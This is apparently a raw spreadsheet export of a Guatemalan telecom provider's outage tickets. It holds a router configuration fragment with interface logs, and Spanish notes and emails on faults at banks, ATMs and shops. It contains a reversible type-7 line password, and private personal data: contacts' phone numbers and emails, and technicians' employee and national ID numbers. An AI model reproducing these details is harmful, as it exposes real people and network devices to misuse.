BRIDGE 1 ROUTE IP
BANNER LOGIN ^C
*********************************************************
*       ACCESO RESTRINGIDO / RESTRICTED ACCESS          *
* SOLO PERSONAL AUTORIZADO / AUTHORIZED PERSONNEL ONLY  *
* TODOS LOS ACCESOS SON MONITOREADOS / MONITORED ACCESS *
*********************************************************
^C
!
LINE CON 0
 AUTHORIZATION EXEC CON_ACC
 LOGIN AUTHENTICATION CON_ACC
 NO MODEM ENABLE
LINE AUX 0
LINE VTY 0 4
 PASSWORD 7 05080F1C22431C
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 60000 1000
NTP SOURCE ATM0.1
NTP SERVER 201.247.152.233 PREFER
NTP SERVER 201.247.152.249
END
IP2350001#          SH IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
ATM0                       UNASSIGNED      YES NVRAM  UP                    UP
ATM0.1                     10.154.75.34    YES NVRAM  UP                    UP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UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.166.20.38    YES NVRAM  UP                    UP
VLAN1                      172.19.1.53     YES NVRAM  DOWN                  DOWN
IP2350001#SHO IP INT BRIE
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
ATM0                       UNASSIGNED      YES NVRAM  UP                    UP
ATM0.1                     10.154.75.34    YES NVRAM  UP                    UP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UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
LOOPBACK5                  10.166.20.38    YES NVRAM  UP                    UP
VLAN1                      172.19.1.53     YES NVRAM  DOWN                  DOWN
IP2350001#SHO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15203 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (8192 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 15204 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
NTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:00:28.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:00:31.383 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:00:34.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:00:53.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:00:56.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:00:59.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:02.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:05.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:08.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:11.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:14.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:17.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:22.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:25.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:28.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:31.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:34.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:37.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:47.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:50.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:53.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:56.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:01:59.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:02.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:05.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:12.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:15.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:18.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:21.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:24.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:27.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:30.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:33.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:36.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:49.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:02:57.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:03:00.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:03:03.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:03:06.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:03:09.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:03:12.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:03:15.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*MAY 24 08:03:18.131 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN</t>
  </si>
  <si>
    <t>F4574774</t>
  </si>
  <si>
    <t>SE RESPONDE CORREO
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: MARTES, 24 DE MAYO DE 2022 15:36PARA: LUIS FERNANDO CUEVAS CALLEJAS &lt;LUIS.CUEVAS@CLARO.COM.GT&gt;; CARINA DEL ROSARIO VELIZ BARCARCEL &lt;CARINAD.VELIZ@CLARO.COM.GT&gt;; BRENDA MARISOL DE PAZ PEREZ &lt;BRENDA.DEPAZ@CLARO.COM.GT&gt;CC: RONALD SMELIN VELASQUEZ ASTORGA &lt;RONALD.VELASQUEZ@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; DESPACHO CORPORATIVO &lt;DESPACHOCORPORATIVO@CLARO.COM.GT&gt;; CARLOS ROBERTO MANZO BARILLAS &lt;CARLOS.MANZO@CLARO.COM.GT&gt;; ABNER GILBERTO HERNANDEZ ARANA &lt;ABNER.HERNANDEZ@CLARO.COM.GT&gt;ASUNTO: RE: OPERADORA DE TIENDAS S.A - 344400722T || C.C. MEGACENTRO CALZ. ROOSEVLETH
BUENAS TARDES,
QUEDAMOS A LA ESPERA DE LA AUTORIZACIÓN.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MANZO  52903081 MENCIONA QUE PERSONAL TECNICO QUE ENVIARON EN EL CORREO NO TIENE VISADO
SI NO CUENTAN CON ESO NO PUEDEN INGRESAR A PR
-ID 1001884836</t>
  </si>
  <si>
    <t>DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: LUNES, 23 DE MAYO DE 2022 17:08PARA: CARLOS ROBERTO MANZO BARILLAS &lt;CARLOS.MANZO@CLARO.COM.GT&gt;; MARIA ELENA CELIS COIN MENDOZA &lt;MARIA.CELIS@CLARO.COM.GT&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;ASUNTO: 344400722T || OPERADORA DE TIENDAS S.A || C.C. MEGACENTRO CALZ. ROOSEVLETH
BUENAS TARDES ESTIMADOS COMPAÑEROS,
DANDO SEGUIMIENTO A LA FALLA REPORTADA DE CLIENTE OPERADORA DE TIENDAS S.A. CON ID 344400722T UBICADO EN C.C. MEGACENTRO CALZ. ROOSEVELT. SOLICITAMOS PUEDAN GESTIONARSE PERMISOS DE ACCESO PARA EL PERSONAL TÉCNICO, ADJUNTO LISTADO DE QUIENES PODRÍAN SER ASIGNADOS A LA ATENCIÓN DE LA MISMA, DEPENDIENDO DE LA DISPONIBILIDAD QUE SE TENGA AL MOMENTO DE LA AUTORIZACIÓN DE LOS PERMISOS, FAVOR INDICAR EL DÍA Y LA HORA A LA QUE SE PUEDA PROGRAMAR LA VISITA. QUEDANDO A LA ESPERA DE SUS COMENTARI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SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4574775</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE ERNESTO RUBIO, INIDICA QUE EL SERVICIO HA ESTADO PRESENTANDO PERDIDAS, Y SOLICITA SE ABRA OTRO TICKET CON IP IP2037286 ,YA QUE ESTA PRESENTANDO LA MISMA SITUACION
NÚMERO: 0050325562049
FIN: HOY, 15:36
ID DE LLAMADA: 1001724676</t>
  </si>
  <si>
    <t>F4574786</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE CON LA INFORMACION DE LOS TECNICOS, SE SOLICITA PERMISOS PARA LAS 13:30 HRS
A LA ESPERA DE LA CONFIRMACION DEL CLIENTE
SD1127073// 2338-6565// BANCO AGROMERCANTIL DE GUATEMALA S.A.- 7 AVENIDA 7-30 ZONA 9
MONICA YIREH CASTILLO POON
ENVIANDO...
BUEN DÍA,
ADJUNTAMOS INFORMACIÓN DEL PERSONAL TÉCNICO QUE NOS ESTARÁ APOYANDO CON LA REVISIÓN DEL SERVICIO DE TELEFONÍA, DEPENDIENDO DE LA DISPONIBILIDAD ESTARÁ LLEGANDO UNA A DOS PERSONAS. FAVOR TRAMITAR PERMISOS PARA EL LISTADO ADJUNTO.
SE ESTIMA LA HORA DE LLEGADA A LAS 13:30 HRS, FAVOR CONFIRMAR SI EN ESTE HORARIO SE PUEDE ACCEDER A LAS INSTALACIONES.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SALUDOS,</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE
RE: SD1127073// 2338-6565// BANCO AGROMERCANTIL DE GUATEMALA S.A.- 7 AVENIDA 7-30 ZONA 9
MONICA YIREH CASTILLO POON
BUENOS DÍAS,
LE COMENTO QUE SE ESTARÁ COORDINANDO PERSONAL TÉCNICO, SE ESTIMA DE 1 HR A 1.30 HR DE LLEGADA A LAS INSTALACIONES. ESTAREMOS VALIDANDO LA DISPONIBILIDAD DEL PERSONAL Y ESTAREMOS COMPARTIENDO LA INFORMACIÓN DEL TÉCNICO QUE NOS APOYARA CON LA VISITA PARA COORDINAR LOS PERMISOS NECESARIOS PARA EL INGRESO A LAS INSTALACIONES.
SALUDOS,</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RODRIGO CABRERA 56395681 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001409505</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE RODRIGO CABRERA QUIEN INDICA QUE UNO DE LOS E1 ESTA EN OTRO PUERTO POR ESTE MOTIVO NO HACE DESBORDE AL MISMO.
CLIENTE INDICA QUE VA A DAR SEGUIMIENTO CON SU PROVEEDOR Y SOLICITA QUE SE PASE EL TICKET A MONITOREO ESTARA VALIDANDO POR MEDIO DE CORREO.
2001202232, 2001202566.
COLA:
NOMBRE: A: 56395681
NÚMERO: 56395681
DURACIÓN: 0:01:02
ESTADO: CONECTADA
DETALLES: 56395681
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 25/05/2022 15:41:56</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RODRIGO CABRERA 56395681 ENVIA DIRECTAMENTE A BUZON
-ID 2001348293</t>
  </si>
  <si>
    <t>SE ENVIO EL SIGUIENTE CORREO AL CLIENTE.
BUENAS TARDES,
POR ESTE MEDIO SE LES INFORMA QUE SE REVISARON LOS SIGUIENTES E1 Y NINGUNO PRESENTA INCONVENIENTES.
+50223386565 0/0/1 -- 1 1---- TRONCALES CON TRAFICO--
+50223386565 0/2/8 -- 1 1 --- TODAS SUS TRONCALES LIBRES SIN TRAFICO--
+50223386565 0/2/14 -- 1 1--- TRONCALES CON TRAFICO
+50223386565 0/3/14 -- 1 1--- TRONCALES CON TRAFICO.
QUEDO A LA ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RODRIGO CABRERA 56395681 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001891406</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RODRIGO CABRERA AL 56395681 INDICA QUE AUN LO SIGUEN VIENDO FUERA SOLICITA QUE SE VEA EN CONJUNTO E INDICA QUE EL SE PONDRA EN CONTACTO CON EL PROVEEDOR Y NOS ESTARA ENVIANDO POR CORREO EL LINK PARA LA REUNION Y LA HORA || SE NOTIFICA A GESTOR **
ID 1001808756
**
**</t>
  </si>
  <si>
    <t>RODRIGO ENOC CABRERA ROSALES &lt;RODRIGO.CABRERA@BAM.COM.GT&gt;
BUENAS TARDES ESTIMADO,
DEBIDO A QUE SE PRESENTARON INCONVENIENTES INTERNOS, SE CAMBIÓ LA VERIFICACIÓN PARA EL DÍA DE MAÑANA POR LA TARDE POR LO QUE LES ESTAREMOS NOTIFICANDO EL RESULTADO DE LAS PRUEBAS.
CUALQUIER CONSULTA ESTOY A LA ORDEN.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RODRIGO CABRERA 56395681 NO RESPONDE, SE INTENTARA LUEGO**
-ID 1001909296
**</t>
  </si>
  <si>
    <t>F4574801</t>
  </si>
  <si>
    <t>SE LLAMA A PR 22866349  PERO NO RESPONDE
-ID 1001766977 - 1001767182</t>
  </si>
  <si>
    <t>SE REVISA COLA DE CORREOS, AUN SIN RESPUESTA DE PARTE DEL CLIENTE, SE LE LLAMA A PDV ENCARGADO // MICHAEL DE LEON // JOSE ERASMO 22866349 // 43949673 // 59894090 ID: 1001776778 / 1001776836 / 1001776884, SE VERIFICA QUE EL SERVICIO NO FUE ENTREGADO, TIENE PROYECTO CANCELADO 3789419, SE VERIFICA TKT ANTERIOR SD1118370 / F4533255Y SE ENCUENTRA CON EL SIGUIENTE COMENTARIO:
ENLACE CAIDO || PERSONAL DE INGENIERIA NO A CULMINADO MIGRACION POR ENDE ESTE NO APLICA COMO FALLA || CLEINTE DEBERA DARLE SEGUIMIENTO CON SU EJECUTIVA DE CUENTAS, SE TENIA PROYECTO CON NUMERO 3789419 QUE ESTA FUE CANCELADO, ADICIONAL INGENIERIA INDICO QUE NO SE A CULMINADO LA MIGRACION VIA CORREO CON ASUNTO &gt;&gt; SOLICITUD DE DISEÑO CORRECTO |PAPA POLLO, SOCIEDAD ANONIMA || 770600013T,  SE NOTIFICA A GESTOR SAMUEL.ESTRADAG VIA SKYPE PARA EL CIERRE, SE DARA SEGUIMIENTO CON EJECUTIVA , TKTS ANTERIOR FUE CERRADO POR LO MISMO Y SE TIENE COLA DE CORREO DE EJECUTIVA:
RE: G106 - ENLACE CLARO - CON ID  770600013T
**</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE 22866349 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001759917</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE ERASMO 59894090 ENVIA DIRECTAMENTE A BUZON
-ID 1001768079</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MICHAEL DE LEON 43949673 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001767432 - 1001767852</t>
  </si>
  <si>
    <t>F4574820</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARLON YOC 40657319 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001761194</t>
  </si>
  <si>
    <t>F4574829</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 23 DE MAYO DE 2022 16:05PARA: HELPDESK04@CAMPERO.COM &lt;HELPDESK04@CAMPERO.COM&gt;; HELPDESK02@CAMPERO.COM &lt;HELPDESK02@CAMPERO.COM&gt;; HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE " CC_CAMPERO_GT_C64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4829
ID: 38300567T
IDENTIFICADOR DEL CLIENTE:  CC_CAMPERO_GT_C644
UBICADO EN:  644, 9A. AVE. 6-142 ZONA 1 C.C. EL TRIANGULO LOCAL 21, PRIMER NIVEL
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4574846</t>
  </si>
  <si>
    <t>INFORMA CLIENTE LEONARDO HERRERA 96130346 QUE SE ENCUENTRA HACIENDO PRUEBAS DE LLAMADAS CON EL E1 EN COMPAÑIA DEL TEC CARLOS MOLINA. SOLICITA SE LE LLAME EN 1 HORA. ID1001959635</t>
  </si>
  <si>
    <t>CLIENTE LEONADO HERRERA 96130346 LUEGO DE REALIZAR VARIAS PRUEBAS VALIDA QUE YA TIENE LLAMADAS DE SUS DID DONDE ANTES TENÍA INCONVENIENTE, INDICA QUE REALIZARON PRUEBAS EN CONJUNTO CON TEC CARLOS MOLINA. CLIENTE AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 1001996735</t>
  </si>
  <si>
    <t>CLIENTE LEONARDO HERRERA SE ENCUENTRA REALIZANDO PRUEBAS CON DISTINTOS DID EN LLAMADAS ENTRANTES Y SALIENTES</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE LEONARDO 96130346 ID:1001749412 QUIEN COMENTA QUE LA VISITA PUEDE SER PARA MAÑANA A PARTIR DE LA 1 PM. SOLICITA ENVIAR CORREO A LEONARDO.HERRERA@COCESNA.ORG</t>
  </si>
  <si>
    <t>F4574853</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE SOLICITANDO REPROGRAMACION
JONATHAN EDUARDO TEZEN MEJIA
BUENA TARDE  ESTIMADO CLIENTE ,
ES UN GUSTO SALUDARLE,  EL PRESENTE ES PARA INDICARLES QUE NUESTRO PERSONAL TÉCNICO SE PRESENTO AL LUGAR ,  A LAS 09:00  SE ESTUVO A LA ESPERA DURANTE MEDIA HORA  POR PERSONAL DE SEGURIDAD SIN EMBARGO NO SE PRESENTO,  SOLICITAMOS DE SU VALIOSO APOYO EN REPROGRAMAR LA VISITA PARA EL DIA DE MAÑANA EN ESPERA DE SU CONFIRMACIÓN.
SALUDOS,</t>
  </si>
  <si>
    <t>CLIENTE REPROGRAMA VISITA  A 10:30</t>
  </si>
  <si>
    <t>PROGRAMADA POR CLIENTE MAÑANA  A LAS 09:00
RE: CAJEROS ATM ATM4505 CAIDA DE SERVICIO
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;;JAIME JOSUE HERNANDEZ CASTILLO;WILLIAM GABRIEL SANAVRIAY 7 MÁS
CC:JOSE RODOLFO ESTRADA MUÑOZ;CESAR RIGOBERTO LEAL OLIVA;SILDA ANABELLA SALAZAR ALVAREZ;CNOCCAY 5 MÁS
JUE 26/05/2022 9:52
BUEN DIA  GRACIAS POR EL SEGUIMIENTO,
CONFIRMADO CON AREA DE CAMPO , POR  FAVOR  COORDINAR APERTURA  MAÑANA VIERNES 27/05/2022  A LAS 09:00.
SALUDOS,
DE: LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 9:37
PARA: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; WILLIAM GABRIEL SANAVRIA &lt;WILLIAM.SANAVRIA@CLARO.COM.GT&gt;; CARLOS FELIPE VELASQUEZ CRISTAL &lt;CARLOSF.VELASQUEZ@CLARO.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SERVICIOS 5B &lt;SERVICIOS5B@5B.COM.GT&gt;; ERWIN CHOQUIN &lt;ECHOQUIN@5B.COM.GT&gt;; CARLOS SOSA &lt;CSOSA@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; SERVICIOS 5B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5B.COM.GT&gt;
ASUNTO: RE: CAJEROS ATM ATM4505 CAIDA DE SERVICIO
BUEN DIA @JONATHAN EDUARDO TEZEN MEJIA
FAVOR DE CONFIRMAR USTEDES Y ASÍ MANDAMOS EL CORREO
SALUDOS.
LUIS ANTONIO GALINDO ALVAREZ
    ¡5B UNA TRAYECTORIA DE CONFIANZA, UN FUTURO DE INNOVACIÓN!
ANALISTA DE SERVICIOS ATMS
PBX:(502) 2420-7200 EXT. 2345
LGALINDO@5B.COM.GT
WWW.5B.COM.GT</t>
  </si>
  <si>
    <t>SE  CUENTA CON CONFIRMACION DE TAVSA
CAJEROS ATM ATM4505 CAIDA DE SERVICIO
PARTE DEL CONTENIDO DE ESTE MENSAJE SE HA BLOQUEADO PORQUE EL REMITENTE NO ESTÁ EN LA LISTA DE REMITENTES SEGUROS. CONFÍO EN EL CONTENIDO DE OPERADORES.ATM4@TAV.COM.GT. | MOSTRAR CONTENIDO BLOQUEADO
PARTE DEL CONTENIDO DE ESTE MENSAJE SE HA BLOQUEADO PORQUE EL REMITENTE NO ESTÁ EN LA LISTA DE REMITENTES SEGUROS.
MONITOREO FALLAS ATMS &lt;OPERADORES.ATM4@TAV.COM.GT&gt;
BUEN DÍA
CONFIRMADO PARA LAS 09:00 EL DIA DE MAÑANA VIERNES 27/05/2022.
SALUDOS.
MY LOGO
TRANSPORTE Y
ADMINISTRACION DE
VALORES S.A</t>
  </si>
  <si>
    <t>F4574864</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ESVIN NAVAS/CLIENTE; SE INFORMA ENLACE AFECTADO POR CORTE DE FO EN SECTOR, AVANCES EN DOS HORAS.</t>
  </si>
  <si>
    <t>F4574884</t>
  </si>
  <si>
    <t>MONITOREO 5B ENVIA A SUPERVISOR.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 23 DE MAYO DE 2022 17:59PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;ASUNTO: RE: [SOLICITUD :##RE-753571##] : ENLACE PRINCIPAL CAIDO PARA CLIENTE "CC_TYT_GT_ATM4236"
GRACIAS QUEDAMOS ATENTOS A LOS HALLAZGOS DEL SUPERVISOR EN PUNTO REMOTO.
SALUDOS.
DE: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;ENVIADO: LUNES, 23 DE MAYO DE 2022 17:54PARA: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;ASUNTO: RE: [SOLICITUD :##RE-753571##] : ENLACE PRINCIPAL CAIDO PARA CLIENTE "CC_TYT_GT_ATM4236"
BUENA TARDE SE ENVIO A EL ADMINISTRADOR PARA SU REVISION
MARVIN TOC
SERVICIOS 5BPBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: LUNES, 23 DE MAYO DE 2022 16:33PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE PRINCIPAL CAIDO PARA CLIENTE "CC_TYT_GT_ATM42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L CAJERO SE ENCUENTRA ACTIVO POR EL ENLACE 3G POR LO QUE POSIBLEMENTE PRESENTE TIEMPOS ALTOS DE RESPUESTA.
TICKET: F4574884
ID: 47502835T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM4236
UBICADO EN:  CAJERO 4236_14 AV. 6-03 ZONA 3, QUETZALTENANGO, QUETZALTENANGO (FARMACIA BATRES NO.109)
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4574889</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL NO RESPONDE, SE INTENTARA LUEGO
-ID  1001913884</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANKLIN ORELLANA AL 44990369  NO RESPONDE SE INTENTARA LUEGO **
ID 100 1925625
**</t>
  </si>
  <si>
    <t>**SE LLAMA AL CLIENTE DE LA CENTRAL FRANKLIN ORELLANA 44990369 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
**AUTORIZA CIERRE DE TICKET **
ID 1001968280
**</t>
  </si>
  <si>
    <t>F4574895</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ISRAEL GONZÁLEZ AL 52988845 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001862900
**</t>
  </si>
  <si>
    <t>F4574922</t>
  </si>
  <si>
    <t>SE  GENERA SOLICITUD  EN 5B | SEGUIMOS A LA ESPERA DE  CONFIRMACION
[SOLICITUD ##RE-754244## ] COORDINACIÓN DE APERTURA F4574922 | _ATM0837 | SD1128750
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
APRECIABLE JONATHAN EDUARDO TEZEN MEJIA
GRACIAS POR SU COMUNICACIÓN, SU SOLICITUD HA SIDO REGISTRADA EN NUESTRO SISTEMA; PRONTO LE ESTAREMOS CONTACTANDO.
DETALLE DE SOLICITUD
SOLICITANTE
 JONATHAN EDUARDO TEZEN MEJIA
CORREO ELECTRÓNICO
 JONATHAN.TEZENM@CLARO.COM.GT
ESTADO
 EN EJECUCIÓN
ASUNTO
COORDINACIÓN DE APERTURA F4574922 | _ATM0837 | SD1128750
BUENA DÍA ESTIMADO CLIENTE
     SOLICITANDO DE SU AMABLE APOYO CON PODER GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA  VALIDAR SERVICIO EN :  F4574922 |  _ATM0837  | SD1128750
AGRADECEMOS   CONFIRMAR SI SE PUEDE REALIZAR APERTURA EL DÍA DE HOY A LAS 14:00 O SE COORDINA PARA MAÑANA A LAS 08:00
NOMBRE                                                          IBM                    DPI
JULIAN LOPEZ, JOSE DANILO                                610004            2082737511106
TUCH PACAJOC, CESAR AUGUSTO                731836          2052962891105
DONIS LÓPEZ, GERBER JOSUÉ                       550149          2086696631101
